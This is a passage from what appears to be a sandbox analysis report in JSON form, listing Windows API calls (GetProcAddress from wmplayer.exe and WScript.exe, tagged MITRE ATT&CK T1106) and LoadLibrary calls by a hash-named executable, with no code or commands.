00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_SetImageCount (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFStartup (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CreateNamedPropertyStore (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateTopologyNode (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateMediaType (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateSampleGrabberSinkActivate (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateAttributes (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateVideoRendererActivate (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateSourceResolver (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateAsyncResult (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter PathFindExtensionW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RtlUnhandledExceptionFilter (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RtlIsThreadWithinLoaderCallout (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_LoadImageW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImageList_Write (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SetLayout (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter StrStrIA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFRequireProtectedEnvironment (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateSequencerSource (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateASFProfileFromPresentationDescriptor (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateTopology (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateAudioRendererActivate (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFPutWorkItemEx (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateRemoteDesktopPlugin (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFCreateMediaSession (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter NlsGetCacheUpdateCount (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter AlphaBlend (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter BeginBufferedPaint (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter BufferedPaintClear (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EndBufferedPaint (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter MFShutdown (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DeleteUrlCacheEntryW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter BufferedPaintRenderAnimation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeTransitionDuration (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter BeginBufferedAnimation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawThemeBackground (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter EndBufferedAnimation (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter PathUndecorateW (UID: 00000000-00002988)\n \"wmplayer.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00002988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SysAddRefString (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SysReleaseString (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayReleaseDescriptor (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayReleaseData (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayAddRef (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WintrustCertificateTrust (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubAuthenticode (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubInitialize (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadMessage (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadSignature (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCheckCert (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCleanup (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter MsiSIPIsMyTypeOfFile (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter StgOpenStorage (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter IsFileSupportedName (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter PutSignedDataMsg (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetSignedDataMsg (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32RedirectTypeLibrary (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004824)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004824)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005796)\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005796)\n 